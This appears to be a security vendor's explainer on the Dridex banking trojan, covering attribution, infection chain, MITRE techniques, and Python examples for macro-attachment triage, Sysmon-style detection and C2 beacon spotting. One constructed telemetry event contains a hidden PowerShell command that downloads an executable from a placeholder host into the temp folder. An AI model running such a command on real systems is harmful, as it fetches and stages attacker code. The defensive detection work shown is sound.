Dridex Malware
Published: 12/23/2025
Written by: Lizzie Danielson
What is Dridex malware?
Dridex malware is a sophisticated banking trojan designed to steal financial information and facilitate malicious activity. It typically targets businesses and individuals through phishing campaigns, causing data breaches and financial loss. Known for its adaptability and evasion tactics, Dridex remains a high-priority threat for cybersecurity defenders.
When was Dridex first discovered?
Dridex first emerged in 2014, evolving from the Cridex trojan. It was initially uncovered by security researchers monitoring malicious email campaigns aimed at distributing the malware.
Who created Dridex?
Dridex is attributed to Evil Corp, a cybercriminal group operating from Russia. In December 2019, the U.S. Treasury's Office of Foreign Assets Control (OFAC) sanctioned Evil Corp, its leader Maksim Viktorovich Yakubets, and over a dozen members and facilitators. Concurrently, the U.S. Department of Justice indicted Yakubets and Evil Corp administrator Igor Turashev on charges related to computer hacking and bank fraud schemes, with a record $5 million reward offered for information leading to Yakubets' arrest.
These sanctions have defensive and compliance implications. Because Evil Corp is a sanctioned entity, paying a ransom to infrastructure linked to it may violate U.S. sanctions, exposing victims to legal and financial consequences beyond the ransom itself.
What does Dridex target?
Dridex focuses on high-value financial targets, including businesses, payment processors, and individuals with access to significant funds. Its emphasis on enterprise environments reflects the scale of financial theft it is built for rather than opportunistic consumer fraud.
Dridex distribution method
The primary distribution method for Dridex is phishing email carrying malicious attachments or links. The attachments are typically macro-enabled Office documents, and the emails masquerade as legitimate business correspondence to trick recipients into opening the file and running the payload. Dridex has also been delivered through exploit kits and by abusing exposed or vulnerable remote desktop protocol (RDP) services.
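Because the lure is almost always a macro-enabled Office document, a useful gateway check is to look inside the attachment container rather than trusting the file extension. The following Python is an added example written for this article, not code from Huntress or from any Dridex sample; the attachments it scans are constructed in memory, and the verdict strings and the decision to hand legacy OLE2 files to a separate scanner are this example's own choices.

```python
import io
import zipfile

# Office Open XML (.docx/.xlsx/.pptx and their macro-enabled variants) is a
# ZIP container.  VBA code lives in a vbaProject.bin part and Excel 4.0 (XLM)
# macros in xl/macrosheets/, so a container listing is enough to flag a
# macro-carrying lure without rendering or executing anything.
MACRO_PARTS = ("xl/vbaProject.bin", "word/vbaProject.bin", "ppt/vbaProject.bin")
OOXML_EXTENSIONS = (".docx", ".docm", ".xlsx", ".xlsm", ".xlsb", ".pptx", ".pptm")
ZIP_MAGIC = b"PK\x03\x04"
OLE2_MAGIC = b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1"   # legacy .doc/.xls container


def contains_macros(blob: bytes) -> bool:
    """True if an OOXML blob carries a VBA project or an XLM macro sheet."""
    try:
        with zipfile.ZipFile(io.BytesIO(blob)) as zf:
            names = {n.lower() for n in zf.namelist()}
    except zipfile.BadZipFile:
        return False
    if any(part.lower() in names for part in MACRO_PARTS):
        return True
    return any(n.startswith("xl/macrosheets/") for n in names)


def classify_attachment(filename: str, blob: bytes) -> str:
    """Gateway verdict for one attachment (verdict wording is this example's own)."""
    name = filename.lower()
    if blob.startswith(ZIP_MAGIC) and contains_macros(blob):
        return "block: macro-enabled Office document"
    if blob.startswith(OLE2_MAGIC):
        # Legacy binary formats keep macros in OLE streams; route these to an
        # OLE-aware scanner (for example oletools' olevba) instead of allowing them.
        return "review: legacy OLE2 document, needs an OLE macro scan"
    if name.endswith(OOXML_EXTENSIONS) and not blob.startswith(ZIP_MAGIC):
        # Extension claims Office XML but the bytes do not: a classic disguise.
        return "quarantine: Office extension does not match file content"
    return "allow"


def build_ooxml(parts) -> bytes:
    """Constructed sample: a minimal ZIP with the given part names (not a real workbook)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for part in parts:
            zf.writestr(part, b"placeholder")
    return buf.getvalue()


# Constructed samples for a dry run
CLEAN_XLSX = build_ooxml(["[Content_Types].xml", "xl/workbook.xml"])
MACRO_XLSM = build_ooxml(["[Content_Types].xml", "xl/workbook.xml", "xl/vbaProject.bin"])
XLM_XLSM = build_ooxml(["[Content_Types].xml", "xl/workbook.xml", "xl/macrosheets/sheet1.xml"])
FAKE_XLSX = b"MZ\x90\x00" + b"\x00" * 60          # PE header bytes behind an .xlsx name
LEGACY_DOC = OLE2_MAGIC + b"\x00" * 56

if __name__ == "__main__":
    for fname, blob in [("invoice.xlsm", MACRO_XLSM), ("report.xlsx", CLEAN_XLSX),
                        ("sheet.xlsm", XLM_XLSM), ("statement.xlsx", FAKE_XLSX),
                        ("scan.doc", LEGACY_DOC)]:
        print(f"{fname}: {classify_attachment(fname, blob)}")
```

This is a first-pass triage, not a substitute for a full macro scanner: it does not inspect the VBA itself, and password-protected or nested (ZIP-in-ZIP) attachments need to be unpacked before the check is meaningful.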
Technical analysis of Dridex malware
A Dridex infection typically starts with a malicious email attachment, usually a macro-enabled Office document, whose embedded script downloads and runs the loader. Once executed, the loader connects to its command-and-control (C2) servers to fetch configuration, encryption keys and instructions. Its modular payload captures keystrokes, hooks browser sessions to redirect or alter web traffic (web injects), and exfiltrates sensitive data.
Dridex is regarded as one of the most technically advanced banking trojans still active, and its primary goal is the theft of banking credentials. To maintain persistence, Dridex modifies registry values so that it is relaunched after a reboot, and it uses process injection (MITRE ATT&CK T1055) to run inside legitimate Windows processes and hide its activity. It employs five code injection techniques to masquerade as legitimate Windows processes (T1036), including the AtomBombing technique, which first appeared in Dridex v4.
While Dridex uses advanced stealth and evasion tactics, it is classified as a banking trojan with botnet capabilities rather than a rootkit. It is commonly distributed through emails carrying malicious Excel documents, and its operators have ties to other malware ecosystems including Ursnif, Emotet, TrickBot, and the DoppelPaymer ransomware.
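The behaviours above (an Office application launching a script host, an autorun registry value written by a program in a user-writable directory, and a remote thread created in another process) are what an EDR or Sysmon rule set keys on. The following Python is an added example, not Huntress detection content or Dridex code; the event dictionaries mimic Sysmon event IDs 1, 13 and 8 with simplified field names, and the events themselves are constructed for the demonstration.

```python
import ntpath
from dataclasses import dataclass


@dataclass
class Alert:
    technique: str   # MITRE ATT&CK ID
    detail: str


OFFICE_APPS = {"excel.exe", "winword.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe",
                "rundll32.exe", "regsvr32.exe", "mshta.exe", "certutil.exe"}
AUTORUN_KEYS = ("\\currentversion\\run\\", "\\currentversion\\runonce\\")
TRUSTED_AUTORUN_WRITERS = {"explorer.exe", "msiexec.exe", "svchost.exe"}
USER_WRITABLE = ("\\appdata\\", "\\temp\\", "\\programdata\\", "\\users\\public\\")


def _exe(path: str) -> str:
    """Lower-cased file name of a Windows path (ntpath works on any host OS)."""
    return ntpath.basename(path).lower()


def detect(events):
    """Run three Dridex-style behavioural rules over Sysmon-like event dicts."""
    alerts = []
    for ev in events:
        eid = ev["event_id"]
        if eid == 1:  # process creation: Office app spawning a script host
            parent, child = _exe(ev["parent_image"]), _exe(ev["image"])
            if parent in OFFICE_APPS and child in SCRIPT_HOSTS:
                alerts.append(Alert("T1204.002/T1059",
                                    f"{parent} spawned {child}: {ev['command_line']}"))
        elif eid == 13:  # registry value set: autorun key touched by an untrusted writer
            target = ev["target_object"].lower()
            if any(k in target for k in AUTORUN_KEYS) and _exe(ev["image"]) not in TRUSTED_AUTORUN_WRITERS:
                alerts.append(Alert("T1547.001",
                                    f"{_exe(ev['image'])} set autorun value {ev['target_object']}"))
        elif eid == 8:  # CreateRemoteThread from a user-writable path into another process
            src, tgt = ev["source_image"].lower(), ev["target_image"].lower()
            if src != tgt and any(d in src for d in USER_WRITABLE):
                alerts.append(Alert("T1055", f"{_exe(src)} created a thread in {_exe(tgt)}"))
    return alerts


# Constructed sample telemetry: one benign launch, then a macro-driven chain.
SID = "S-1-5-21-1111111111-2222222222-3333333333-1001"
SAMPLE_EVENTS = [
    {"event_id": 1, "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     "command_line": r'"EXCEL.EXE" C:\Users\alice\Downloads\invoice_4471.xlsm'},
    {"event_id": 1, "parent_image": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     "image": r"C:\Windows\System32\cmd.exe",
     "command_line": r'cmd.exe /c powershell -w hidden -nop -c "iwr http://lure.invalid/p -o %TEMP%\p.exe"'},
    {"event_id": 13, "image": r"C:\Users\alice\AppData\Local\Temp\p.exe",
     "target_object": rf"HKU\{SID}\Software\Microsoft\Windows\CurrentVersion\Run\Updater"},
    {"event_id": 13, "image": r"C:\Windows\explorer.exe",
     "target_object": rf"HKU\{SID}\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden"},
    {"event_id": 8, "source_image": r"C:\Users\alice\AppData\Local\Temp\p.exe",
     "target_image": r"C:\Windows\explorer.exe"},
]

if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print(f"[{alert.technique}] {alert.detail}")
```

Real Sysmon events carry these fields as ParentImage/Image/CommandLine, TargetObject and SourceImage/TargetImage; map them before feeding the rules. Expect to tune the allowlists: installers and Office add-ins legitimately write Run keys, and some security tools create remote threads from ProgramData.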
Tactics, Techniques & Procedures (TTPs)
MITRE ATT&CK Techniques: T1566.001 - Spearphishing Attachment, T1203 - Exploitation for Client Execution, T1059 - Command and Scripting Interpreter, T1055 - Process Injection, T1036 - Masquerading.
Behavioral Traits: Use of polymorphic code for evasion and connection to distributed botnets.
Indicators of Compromise (IoCs)
Suspicious domains or IPs tied to C2 servers.
Malicious document hashes used for distribution.
Abnormal traffic patterns indicating system compromise.
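Matching known indicators is the easy half; the "abnormal traffic patterns" bullet is usually caught by looking for connections that recur at a near-constant interval, which is how a bot polls its C2. The Python below is an added example, not code from this page or from Huntress; the indicator values use reserved documentation addresses and the .invalid TLD, the key=value log format is assumed, and every log line is constructed.

```python
import statistics
from collections import defaultdict
from datetime import datetime, timedelta, timezone

# Constructed indicators: documentation IP ranges and a reserved TLD, not real C2.
IOC_IPS = {"203.0.113.45"}
IOC_DOMAINS = {"update-check.invalid"}


def parse(line: str) -> dict:
    """Parse one key=value connection log line (format assumed for this example)."""
    rec = dict(kv.split("=", 1) for kv in line.split())
    rec["ts"] = datetime.strptime(rec["ts"], "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)
    return rec


def ioc_hits(records):
    """Records whose destination IP or TLS SNI is on the indicator lists."""
    return [r for r in records if r["dst"] in IOC_IPS or r.get("sni") in IOC_DOMAINS]


def beacons(records, min_conns=6, max_cv=0.15):
    """Flag (src, dst) pairs whose connection gaps are suspiciously regular.

    The coefficient of variation (stdev / mean) of the inter-connection gaps is
    near zero for a timer-driven poll and large for human-driven traffic.
    """
    by_pair = defaultdict(list)
    for r in records:
        by_pair[(r["src"], r["dst"])].append(r["ts"])
    found = []
    for pair, times in by_pair.items():
        if len(times) < min_conns:
            continue
        times.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
        mean = statistics.mean(gaps)
        if mean <= 0:
            continue
        cv = statistics.pstdev(gaps) / mean
        if cv <= max_cv:
            found.append((pair, round(mean), round(cv, 3)))
    return found


# Constructed sample log
BASE = datetime(2025, 12, 23, 9, 0, 0)


def _line(offset_s, src, dst, sni="-"):
    ts = (BASE + timedelta(seconds=offset_s)).strftime("%Y-%m-%dT%H:%M:%SZ")
    return f"ts={ts} src={src} dst={dst} dport=443 sni={sni} bytes=612"


SAMPLE_LOG = (
    # a bot polling every ~5 minutes with a little jitter
    [_line(t, "10.0.0.12", "198.51.100.7") for t in (0, 300, 602, 899, 1201, 1500, 1798, 2100)]
    # a user browsing the same site at irregular intervals
    + [_line(t, "10.0.0.20", "192.0.2.10") for t in (0, 15, 400, 410, 1700, 1705, 3000)]
    # one-off contacts with listed indicators
    + [_line(50, "10.0.0.12", "203.0.113.45"),
       _line(75, "10.0.0.31", "198.51.100.200", sni="update-check.invalid")]
)
RECORDS = [parse(line) for line in SAMPLE_LOG]

if __name__ == "__main__":
    for r in ioc_hits(RECORDS):
        print("IOC hit:", r["src"], "->", r["dst"], r["sni"])
    for pair, period, cv in beacons(RECORDS):
        print(f"beacon: {pair[0]} -> {pair[1]} every ~{period}s (cv={cv})")
```

Feed this from proxy, firewall or NetFlow exports rather than endpoint logs so that it also sees hosts without an agent. Modern bots add deliberate jitter, so raise max_cv and min_conns gradually while watching the false-positive rate; legitimate pollers (update checkers, monitoring agents) will show up too and belong on an allowlist.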
How to know if you’re infected with Dridex?
Symptoms of a Dridex infection include slow device performance, unauthorized bank account activity, unexpected new files or registry autorun entries, and unexplained outbound connections originating from endpoints or servers.
Dridex removal instructions
For manual removal of Dridex, isolate the infected system immediately to prevent lateral movement. Use endpoint detection and response (EDR) tools to locate and remove malicious processes. Because Dridex injects into legitimate processes and may have downloaded additional payloads, reimaging the host and resetting any credentials used on it is the safer course. Huntress 24/7 SOC tools provide real-time monitoring and advanced cleanup for Dridex infections.
Is Dridex still active?
Dridex remains active and an ongoing threat. New variants continue to surface, showcasing its adaptability through enhanced social engineering tactics and capabilities. Organizations must remain vigilant against this persistent menace.
Mitigation & prevention strategies
To prevent Dridex infections, implement regular patching of vulnerable software, enforce multi-factor authentication (MFA), and conduct robust phishing awareness training. Network monitoring and managed detection and response (MDR) services like Huntress can detect suspicious activity and mitigate threats before significant damage occurs.